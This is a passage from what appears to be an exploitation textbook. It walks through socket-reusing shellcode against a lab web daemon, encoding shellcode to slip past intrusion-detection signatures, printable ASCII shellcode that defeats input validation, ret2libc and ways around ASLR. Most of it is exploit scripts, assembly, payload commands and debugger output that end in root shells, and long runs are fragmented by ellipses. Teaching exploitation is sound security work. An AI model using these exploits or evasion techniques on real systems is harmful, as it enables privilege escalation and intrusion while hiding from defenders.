somewhat useless in itself, but when the command is piped into netcat, this
effectively ties standard input and output to netcat's network socket
...
This is done with just a few
modifications (shown in bold) to the silent exploit tool
...
sh
#!/bin/sh
# Silent stealth exploitation tool for tinywebd
# also spoofs IP address stored in memory
# reuses existing socket-use socket_reuse shellcode

SPOOFIP="12
...
56
...
1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))
echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE]
[ret
addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";

...
\"$FAKEADDR\"x2
...
The following
output demonstrates this
...
s
reader@hacking:~/booksrc $ hexdump -C socket_reuse_restore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j
...
t
...
|
00000010 04 08 c3 8d 54 24 5c 8b 1a 6a 02 59 31 c0 31 d2 |
...
j
...
1
...
Iy
...
R
...
|
0000003e
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh socket_reuse_restore 127
...
0
...
0
...
1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
whoami
root

By reusing the existing socket, this exploit is even quieter since it doesn't create
any additional connections
...

Payload Smuggling
The aforementioned network IDS or IPS systems can do more than just track
connections—they can also inspect the packets themselves
...
For example, a simple rule
looking for packets that contain the string /bin/sh would catch a lot of packets
containing shellcode
...

These types of network IDS signatures can be fairly effective at catching script
kiddies who are using exploits they downloaded from the Internet
...

String Encoding
To hide the string, we will simply add 5 to each byte in the string
...
This will build the desired string on the stack so it can be used
in the shellcode, while keeping it hidden during transit
...

reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh
...
Also, two int3 instructions are used to put breakpoints in the
shellcode before and after the decoding
...

encoded_sockreuserestore_dbg
...

pop eax
int 0x80 ; After the fork, in child process eax == 0
...

; In the parent process, restore tinywebd
...

push 0x08048fb7 ; Return address
...

lea edx, [esp+0x5c] ; Put the address of new_sockfd in edx
...

push BYTE 0x02
pop ecx ; ecx starts at 2
...

jns dup_loop ; If the sign flag is not set, ecx is not negative
; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
push 0x056d7834 ; push "/sh\x00" encoded +5 to the stack
...

mov ebx, esp ; Put the address of encoded "/bin/sh" into ebx
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
It begins at 8 and counts
down to 0, since 8 bytes need to be decoded
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
out
Starting tiny web daemon
...
From another terminal, the shellcode is assembled and used with
the socket-reusing exploit tool
...
s
reader@hacking:~/booksrc $
...
sh encoded_socketreuserestore_dbg
127
...
0
...
0
...
1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open

Back in the GDB window, the first int3 instruction in the shellcode is hit
...

Program received signal SIGTRAP, Trace/breakpoint trap
...

[tcsetpgrp failed in terminal_inferior: Operation not permitted]
Program received signal SIGTRAP, Trace/breakpoint trap
...
The following output shows the final shellcode being used
...
s >
encoded_sockreuserestore
...
s encoded_sockreuserestore
...
s
reader@hacking:~/booksrc $ hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j
...
t
...
|
00000010 04 08 c3 8d 54 24 5c 8b 1a 6a 02 59 31 c0 b0 3f |
...
j
...
?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |
...
h4xm
...
j
...
Jy
...
R|
00000040 89 e2 53 89 e1 cd 80 |
...
|
00000047
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh encoded_sockreuserestore 127
...
0
...
0
...
1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
whoami
root

How to Hide a Sled
The NOP sled is another signature easy to detect by network IDSes and IPSes
...
To avoid this signature, we can use
different single-byte instructions instead of NOP
...

Inst ruct ion Hex ASCII
inc eax

0x40

@

inc ebx

0x43

C

inc ecx

0x41

A

inc ecx

0x42

B

dec eax

0x48

H

dec ebx

0x4B

K

dec ecx

0x49

I

dec edx

0x4A

J

Since we zero out these registers before we use them, we can safely use a random
combination of these bytes for the NOP sled
...
The easiest way to do
this would be by writing a sled-generation program in C, which is used with a
BASH script
...

Buffer Restrictions
Sometimes a program will place certain restrictions on buffers
...
Consider the following example
program, which is used to update product descriptions in a fictitious database
...

This program doesn't actually update a database, but it does have an obvious
vulnerability in it
...
c
#include ...
h>
#include ...
*/
void barf(char *message, void *extra) {
printf(message, extra);
exit(1);
}
/* Pretend this function updates a product description in a database
...

barf("Fatal: id argument must be less than %u bytes\n", (void *)MAX_ID_LEN);
for(i=0; i < strlen(desc)-1; i++) { // Only allow printable bytes in desc
...

}

Despite the vulnerability, the code does make an attempt at security
...
In addition, the unused
environment variables and program arguments are cleared out for security
reasons
...

reader@hacking:~/booksrc $ gcc -o update_info update_info
...
/update_info
reader@hacking:~/booksrc $ sudo chmod u+s
...
/update_info
Usage:
...
/update_info OCP209 "Enforcement Droid"
[DEBUG]: description is at 0xbffff650
Updating product #OCP209 with description 'Enforcement Droid'
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
/update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat
...
bin)
Fatal: description argument can only contain printable bytes
reader@hacking:~/booksrc $

This output shows a sample usage and then tries to exploit the vulnerable
strcpy() call
...
However, this buffer is checked for nonprintable bytes
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

0xbffff9cb in ?? ()
(gdb) i r eip
eip 0xbffff9cb 0xbffff9cb
(gdb) x/s $eip
0xbffff9cb: "blah"
(gdb)

The printable input validation is the only thing stopping exploitation
...
And while it's
not possible to avoid this check, there are ways to smuggle illicit data past the
guards
...
The encoding
shellcode from the previous section is technically polymorphic, since it modifies
the string it uses while it's running
...
There are other instructions that fall into this
printable range (from 0x33 to 0x7e); however, the total set is actually rather
small
...

Trying to write complex shellcode with such a limited instruction set would simply
be masochistic, so instead, the printable shellcode will use simple methods to
build more complex shellcode on the stack
...

The first step is figuring out a way to zero out registers
...
One option is to use the AND bitwise operation, which assembles
into the percent character (%) when using the EAX register
...

An AND operation transforms bits as follows:
1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Since the only case where the result is 1 is when both bits are 1, if two inverse
values are ANDed onto EAX, EAX will become zero
...

and eax, 0x454e4f4a ; Assembles into %JONE
and eax, 0x3a313035 ; Assembles into %501:

So %JONE%501: in machine code will zero out the EAX register
...
Some
other instructions that assemble into printable ASCII characters are shown in the
box below
...
The general technique is, first, to set ESP back behind the executing
loader code (in higher memory addresses), and then to build the shellcode from
end to start by pushing values onto the stack, as shown here
...
Eventually, EIP and ESP
will meet up, and the EIP will continue executing into the freshly built shellcode
...

First, ESP must be set behind the printable loader shellcode
...
The
ESP register must be moved so it's after the loader code, while still leaving room
for the new shellcode and for the loader shellcode itself
...
This value doesn't need to be exact, since provisions will
be made later to allow for some slop
...
The register only has 32 bits of space, so adding 860 to a
register is the same as subtracting 860 from 232, or 4,294,966,436
...

sub eax, 0x39393333 ; Assembles into -3399
sub eax, 0x72727550 ; Assembles into -Purr
sub eax, 0x54545421 ; Assembles into -!TTT

As the GDB output confirms, subtracting these three values from a 32-bit number
is the same as adding 860 to it
...
So the current value of
ESP must be moved into EAX for the subtraction, and then the new value of EAX
must be moved back into ESP
...
By pushing the
value from the source register to the stack and then popping it off into the
destination register, the equivalent of a mov dest, source instruction can be
accomplished with push source and pop dest
...

Here is the final set of instructions to add 860 to ESP
...
So
far, so good
...

First, EAX must be zeroed out; this is easy now that a method has been
discovered
...
Since the stack normally
grows upward (toward lower memory addresses) and builds with a FILO
ordering, the first value pushed to the stack must be the last four bytes of the

shellcode
...
The following output shows a hexadecimal dump of the standard
shellcode used in the previous chapters, which will be built by the printable loader
code
...
/shellcode
...
1
...
j
...
Q
...
|
00000020 e1 cd 80 |
...
This is easy to do by using sub instructions to wrap the
value around
...
This moves ESP up (toward
lower memory addresses) to the end of the newly pushed value, ready for the next
four bytes of shellcode (shown in italic in the preceding shellcode)
...
As this process is repeated for each four-byte chunk, the
shellcode is built from end to start, toward the executing loader code
...
1
...
j
...
Q
...
|
00000020 e1 cd 80 |
...
This situation is alleviated by inserting one singlebyte NOP instruction
at the beginning of the code, resulting in the value 0x31c03190 being pushed to
the stack—0x90 is machine code for NOP
...
The following source code is a
program to help calculate the necessary printable values
...
c
#include ...
h>
#include ...
h>
#include ...
h>
#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"
int main(int argc, char* argv[])
{
unsigned int targ, last, t[4], l[4];
unsigned int try, single, carry=0;
int len, a, i, j, k, m, z, flag=0;
char word[3][4];
unsigned char mem[70];
if(argc < 2) {
printf("Usage: %s \n", argv[0]);

exit(1);
}
srand(time(NULL));
bzero(mem, 70);
strcpy(mem, CHR);
len = strlen(mem);
strfry(mem); // Randomize
last = strtoul(argv[1], NULL, 0);
targ = strtoul(argv[2], NULL, 0);
printf("calculating printable values to subtract from EAX
...
For the printable loader shellcode, EAX is zeroed out to start with, and
the end value should be 0x80cde189
...
bin
...
c
reader@hacking:~/booksrc $
...

start: 0x00000000
- 0x346d6d25
- 0x256d6d25
- 0x2557442d
------------------end: 0x80cde189
reader@hacking:~/booksrc $ hexdump -C
...
bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1
...
1
...
XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin
...
S
...
|
00000023
reader@hacking:~/booksrc $
...

start: 0x80cde189
- 0x59316659
- 0x59667766
- 0x7a537a79
------------------end: 0x53e28951
reader@hacking:~/booksrc $

The output above shows the printable values needed to wrap the zeroed EAX
register around to 0x80cde189 (shown in bold)
...
This process is repeated until all the shellcode is built
...

printable
...

sub eax,0x39393333 ; Subtract printable values
sub eax,0x72727550 ; to add 860 to EAX
...

pop esp ; Effectively ESP = ESP + 860
and eax,0x454e4f4a
and eax,0x3a313035 ; Zero out EAX
...

sub eax,0x2557442d ; (last 4 bytes from shellcode
...

sub eax,0x59316659 ; Subtract more printable values

sub eax,0x59667766 ; to make EAX = 0x53e28951
...

push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

At the end, the shellcode has been built somewhere after the loader code, most
likely leaving a gap between the newly built shellcode and the executing loader
code
...

Once again, sub instructions are used to set EAX to 0x90909090, and EAX is
repeatedly pushed to the stack
...
Eventually, these NOP instructions
will build right over the executing push instructions of the loader code, allowing
the EIP and program execution to flow over the sled into the shellcode
...

reader@hacking:~/booksrc $ nasm printable
...
/printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%
-ptt%P%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w-B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $

This printable ASCII shellcode can now be used to smuggle the actual shellcode
past the input-validation routine of the update_info program
...
/update_info $(perl -e 'print "AAAA"x10') $(cat
...
/update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat
...
2# whoami
root
sh-3
...
In case you weren't able to follow everything that just happened there, the
output below watches the execution of the printable shellcode in GDB
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 : push ebp
0x080484a9 : mov ebp,esp
0x080484ab : sub esp,0x28
0x080484ae : mov eax,DWORD PTR [ebp+8]
0x080484b1 : mov DWORD PTR [esp+4],eax
0x080484b5 : lea eax,[ebp-24]
0x080484b8 : mov DWORD PTR [esp],eax
0x080484bb : call 0x8048388
0x080484c0 : mov eax,DWORD PTR [ebp+12]
0x080484c3 : mov DWORD PTR [esp+8],eax

0x080484c7 : lea eax,[ebp-24]
0x080484ca : mov DWORD PTR [esp+4],eax
0x080484ce : mov DWORD PTR [esp],0x80487a0
0x080484d5 : call 0x8048398
0x080484da : leave
0x080484db : ret
End of assembler dump
...
c, line 21
...
/printable)
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "AAAA"x10') $(cat
...

0xb7f06bfb in strlen () from /lib/tls/i686/cmov/libc
...
6
(gdb) run $(perl -e 'print "\xfd\xf8\xff\xbf"x10') $(cat
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xfd\xf8\xff\xbf"
x10')
$(cat
...
c:21
21 }
(gdb) stepi
0xbffff8fd in ?? ()
(gdb) x/9i $eip
0xbffff8fd: push esp
0xbffff8fe: pop eax
0xbffff8ff: sub eax,0x39393333
0xbffff904: sub eax,0x72727550
0xbffff909: sub eax,0x54545421
0xbffff90e: push eax
0xbffff90f: pop esp
0xbffff910: and eax,0x454e4f4a
0xbffff915: and eax,0x3a313035
(gdb) i r esp
esp 0xbffff6d0 0xbffff6d0
(gdb) p /x $esp + 860
$1 = 0xbffffa2c
(gdb) stepi 9
0xbffff91a in ?? ()
(gdb) i r esp eax
esp 0xbffffa2c 0xbffffa2c
eax 0x0 0
(gdb)

The first nine instructions add 860 to ESP and zero out the EAX register The next
eight instructions push the last eight bytes of the shellcode to the stack in four-

byte chunks
...

(gdb) x/8i $eip
0xbffff91a: sub eax,0x346d6d25
0xbffff91f: sub eax,0x256d6d25
0xbffff924: sub eax,0x2557442d
0xbffff929: push eax
0xbffff92a: sub eax,0x59316659
0xbffff92f: sub eax,0x59667766
0xbffff934: sub eax,0x7a537a79
0xbffff939: push eax
(gdb) stepi 8
0xbffff93a in ?? ()
(gdb) x/4x $esp
0xbffffa24: 0x53e28951 0x80cde189 0x00000000 0x00000000
(gdb) stepi 32
0xbffff9ba in ?? ()
(gdb) x/5i $eip
0xbffff9ba: push eax
0xbffff9bb: push eax
0xbffff9bc: push eax
0xbffff9bd: push eax
0xbffff9be: push eax
(gdb) x/16x $esp
0xbffffa04: 0x90909090 0x31c03190 0x99c931db 0x80cda4b0
0xbffffa14: 0x51580b6a 0x732f2f68 0x622f6868 0xe3896e69
0xbffffa24: 0x53e28951 0x80cde189 0x00000000 0x00000000
0xbffffa34: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) i r eip esp eax
eip 0xbffff9ba 0xbffff9ba
esp 0xbffffa04 0xbffffa04
eax 0x90909090 -1869574000
(gdb)

Now with the shellcode completely constructed on the stack, EAX is set to
0x90909090
...

(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff9ea: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff9fa: 0x00000000 0x00000000 0x90900000 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x90900000 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x90905050

0xbffff9ca: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9da: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb)

Now the execution pointer (EIP) can flow over the NOP bridge into the
constructed shellcode
...
It and all the other
techniques we discussed are just building blocks that can be used in a myriad of
different combinations
...
Be
clever and beat them at their own game
...
It
was only a matter of time for programmers to come up with some clever
protection methods
...

Nonexecutable Stack
Most applications never need to execute anything on the stack, so an obvious
defense against buffer overflow exploits is to make the stack nonexecutable
...
This
type of defense will stop the majority of exploits out there, and it is becoming
more popular
...

ret2libc
Of course, there exists a technique used to bypass this protective
countermeasure
...
libc is a standard C
library that contains various basic functions, such as printf() and exit()
...
An exploit can do the exact same
thing and direct a program's execution into a certain function in libc
...
However, nothing is
ever executed on the stack
...
As you recall, this
function takes a single argument and executes that argument with /bin/sh
...
For this
example, a simple vulnerable program will be used
...
c
int main(int argc, char *argv[])
{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}

Of course, this program must be compiled and setuid root before it's truly
vulnerable
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/vuln
reader@hacking:~/booksrc $ ls -l
...
/vuln

reader@hacking:~/booksrc $

The general idea is to force the vulnerable program to spawn a shell, without
executing anything on the stack, by returning into the libc function system()
...

First, the location of the system() function in libc must be determined
...
One of the easiest ways to find the location of a libc
function is to create a simple dummy program and debug it, like this:
reader@hacking:~/booksrc $ cat > dummy
...
c
reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy
Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {} 0xb7ed0d80
(gdb) quit

Here, a dummy program is created that uses the system() function
...
The program is executed, and then the location of the system()
function is displayed
...

Armed with that knowledge, we can direct program execution into the system()
function of libc
...

When returning into libc, the return address and function arguments are read off
the stack in what should be a familiar format: the return address followed by the
arguments
...

Directly after the address of the desired libc function is the address to which
execution should return after the libc call
...

In this case, it doesn't really matter where the execution returns to after the libc
call, since it will be opening an interactive shell
...
There is only one argument, which should be a
pointer to the string /bin/sh
...
In the output below, the string is
prefixed with several spaces
...

reader@hacking:~/booksrc $ export BINSH=" /bin/sh"
reader@hacking:~/booksrc $
...
/vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $

So the system() address is 0xb7ed0d80, and the address for the /bin/sh string
will be 0xbffffe5b when the program is executed
...

A quick binary search shows that the return address is probably overwritten by
the eighth word of the program input, so seven words of dummy data are used for
spacing in the exploit
...
/vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $
...
/vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $
...
/vuln $(perl -e 'print "ABCD"x7
...
2# whoami
root
sh-3
...
The
return address of FAKE used in the example can be changed to direct program
execution
...

Randomized Stack Space
Another protective countermeasure tries a slightly different approach
...
When the memory layout is randomized, the attacker won't be
able to return execution into waiting shellcode, since he won't know where it is
...
6
...
To turn this
protection on again, echo 1 to the /proc filesystem as shown below
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------reader@hacking:~/booksrc $

With this countermeasure turned on, the notesearch exploit no longer works,
since the layout of the stack is randomized
...
The following example demonstrates this
...
c
#include ...
However with
ASLR turned on, exploitation isn't that easy
...
c
reader@hacking:~/booksrc $
...
/aslr_demo
buffer is at 0xbfe4de20
reader@hacking:~/booksrc $
...
/aslr_demo $(perl -e 'print "ABCD"x20')
buffer is at 0xbf9a4920
Segmentation fault
reader@hacking:~/booksrc $

Notice how the location of the buffer on the stack changes with every run
...
The randomization changes the
location of everything on the stack, including environment variables
...
bin)
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfd919c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfe499c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfcae9c3
reader@hacking:~/booksrc $

This type of protection can be very effective in stopping exploits by the average
attacker, but it isn't always enough to stop a determined hacker
...
When a program exits, the value returned from the main function is
the exit status
...

reader@hacking:~/booksrc $
...
/aslr_demo $(perl -e 'print "AAAA"x50')
buffer is at 0xbfbe2ac0
Segmentation fault
reader@hacking:~/booksrc $ echo $?
139
reader@hacking:~/booksrc $

Using BASH's if statement logic, we can stop our brute-forcing script when it
crashes the target
...
The break
statement tells the script to break out of the for loop
...
/aslr_demo $(perl -e "print 'AAAA'x$i")
> if [ $? != 1 ]
> then
> echo "==> Correct offset to return address is $i words"
> break

> fi
> done
Trying offset of 1 words
buffer is at 0xbfc093b0
Trying offset of 2 words
buffer is at 0xbfd01ca0
Trying offset of 3 words
buffer is at 0xbfe45de0
Trying offset of 4 words
buffer is at 0xbfdcd560
Trying offset of 5 words
buffer is at 0xbfbf5380
Trying offset of 6 words
buffer is at 0xbffce760
Trying offset of 7 words
buffer is at 0xbfaf7a80
Trying offset of 8 words
buffer is at 0xbfa4e9d0
Trying offset of 9 words
buffer is at 0xbfacca50
Trying offset of 10 words
buffer is at 0xbfd08c80
Trying offset of 11 words
buffer is at 0xbff24ea0
Trying offset of 12 words
buffer is at 0xbfaf9a70
Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==> Correct offset to return address is 19 words
reader@hacking:~/booksrc $

Knowing the proper offset will let us overwrite the return address
...
Using GDB, let's
look at the program just as it's about to return from the main function
...
/aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo
...

(gdb)

The breakpoint is set at the last instruction of main
...
When an exploit overwrites the return
address, this is the last instruction where the original program has control
...

(gdb) run
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfa131a0

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfd8e520
Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfaada40
Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo
...
This makes sense, since the stack
pointer points to the stack and the buffer is on the stack
...

GDB's stepi command steps the program forward in execution by a single
instruction
...

(gdb) run
The program being debugged has been started already
...
c:12
12 }
(gdb) i r esp
esp 0xbfd1ccfc 0xbfd1ccfc
(gdb) stepi
0xb7e4debc in __libc_start_main () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r esp
esp 0xbfd1cd00 0xbfd1cd00
(gdb) x/24x 0xbfd1ccb0
0xbfd1ccb0: 0x00000000 0x080495cc 0xbfd1ccc8 0x08048291
0xbfd1ccc0: 0xb7f3d729 0xb7f74ff4 0xbfd1ccf8 0x08048429
0xbfd1ccd0: 0xb7f74ff4 0xbfd1cd8c 0xbfd1ccf8 0xb7f74ff4
0xbfd1cce0: 0xb7f937b0 0x08048410 0x00000000 0xb7f74ff4
0xbfd1ccf0: 0xb7f9fce0 0x08048410 0xbfd1cd58 0xb7e4debc
0xbfd1cd00: 0x00000001 0xbfd1cd84 0xbfd1cd8c 0xb7fa0898
(gdb) p 0xbfd1cd00 - 0xbfd1ccb0
$1 = 80
(gdb) p 80/4
$2 = 20
(gdb)

Single stepping shows that the ret instruction increases the value of ESP by 4
...
Since the return
address's offset was 19 words, this means that after main's final ret instruction,
ESP points to stack memory found directly after the return address
...

Bouncing Off linux-gate

The technique described below doesn't work with Linux kernels starting from
2
...
18
...
The kernel used in the included LiveCD is 2
...
20, so the
output below is from the machine loki, which is running a 2
...
17 Linux kernel
...

Bouncing off linux-gate refers to a shared object, exposed by the kernel, which looks
like a shared library
...
Do you notice anything interesting about the linux-gate library in
the output below?
matrix@loki /hacking $ $ uname -a
Linux hacking 2
...
17 #2 SMP Sun Apr 11 03:42:05 UTC 2007 i686 GNU/Linux
matrix@loki /hacking $ cat /proc/sys/kernel/randomize_va_space
1
matrix@loki /hacking $ ldd
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
so
...
This is a virtual dynamically shared object used by
the kernel to speed up system calls, which means it's needed in every process
...

The important thing is that every process has a block of memory containing linuxgate's instructions, which are always at the same location, even with ASLR
...
This instruction will jump EIP to where ESP is pointing
...

matrix@loki /hacking $ cat > jmpesp
...
s
matrix@loki /hacking $ hexdump -C jmpesp
00000000 ff e4 |
...

find_jmpesp
...
This can be further verified using GDB:
matrix@loki /hacking $
...
/aslr_demo
Using host libthread_db library "/lib/libthread_db
...
1"
...
c, line 7
...
c:7
7 printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777: jmp esp
(gdb)

Putting it all together, if we overwrite the return address with the address
0xffffe777, then execution will jump into linux-gate when the main function
returns
...
From our previous
debugging, we know that at the end of the main function, ESP is pointing to
memory directly after the return address
...

matrix@loki /hacking $ sudo chown root:root
...
/aslr_demo
matrix@loki /hacking $
...
bin)
buffer is at 0xbf8d9ae0
sh-3
...

matrix@loki /hacking $ for i in `seq 1 50`; do
...
/notesearch $(perl -e 'print "\x77\xe7\xff\xff"x35')$(cat
scode
...
/notesearch $(perl -e 'print "\x77\xe7\xff\xff"x36')$(cat
scode2
...
1#

The initial estimate of 35 words was off, since the program still crashed with the
slightly smaller exploit buffer
...

Sure, bouncing off linux-gate is a slick trick, but it only works with older Linux
kernels
...
6
...

reader@hacking:~/booksrc $ uname -a
Linux hacking 2
...
20-15-generic #2 SMP Sun Apr 15 07:36:31 UTC 2007 i686 GNU/Linux
reader@hacking:~/booksrc $ gcc -o find_jmpesp find_jmpesp
...
/find_jmpesp
reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo
...
/aslr_demo test
buffer is at 0xbfcf3480
reader@hacking:~/booksrc $
...
bin)
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfc8d9c3
reader@hacking:~/booksrc $
...
/aslr_demo
SHELLCODE will be at 0xbfa0c9c3
reader@hacking:~/booksrc $

Without the jmp esp instruction at a predictable address, there is no easy way to
bounce off of linux-gate
...
The state of computer security
is a constantly changing landscape, and specific vulnerabilities are discovered and
patched every day
...
Like LEGO bricks, these techniques can be used in
millions of different combinations and configurations
...
With this
understanding comes the wisdom to guesstimate offsets and recognize memory
segments by their address ranges
...
Hopefully, you have a few bypass ideas you
might want to try out now
...
There are probably several ways to bypass ASLR, and you
may invent a new technique
...
But it's worthwhile to think about this problem a little
on your own before reading ahead
...
My first thought was to leverage the
execl() family of functions
...

EXEC(3) Linux Programmer's Manual
NAME
execl, execlp, execle, execv, execvp - execute a file
SYNOPSIS
#include ...
);
int execlp(const char *file, const char *arg,
...
, char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
DESCRIPTION
The exec() family of functions replaces the current process
image with a new process image
...
(See the
manual page for execve() for detailed information about the
replacement of the current process
...
Let's test this hypothesis with a piece of code

that prints the address of a stack variable and then executes aslr_demo using an
execl() function
...
c
#include ...
h>
int main(int argc, char *argv[]) {
int stack_var;
// Print an address from the current stack frame
...

execl("
...
This lets us compare the
memory layouts
...
c
reader@hacking:~/booksrc $ gcc -o aslr_execl aslr_execl
...
/aslr_demo test
buffer is at 0xbf9f31c0
reader@hacking:~/booksrc $
...
/aslr_execl
stack_var is at 0xbf832044
buffer is at 0xbf832000
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf832044 - 0xbf832000"
$1 = 68
reader@hacking:~/booksrc $
...
/aslr_execl
stack_var is at 0xbfbb0bc4
buffer is at 0xbff3e710
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfbb0bc4 - 0xbff3e710"
$1 = 4291241140
reader@hacking:~/booksrc $
...
I'm sure this wasn't always the case, but the progress of open source is
rather constant
...

Playing the Odds
Using execl() at least limits the randomness and gives us a ballpark address
range
...
A quick
examination of aslr_demo shows that the overflow buffer needs to be 80 bytes to
overwrite the stored return address on the stack
...
/aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
"BBBB"')
Starting program: /home/reader/booksrc/aslr_demo $(perl -e 'print "AAAA"x19
...

0x42424242 in ?? ()
(gdb) p 20*4
$1 = 80
(gdb) quit
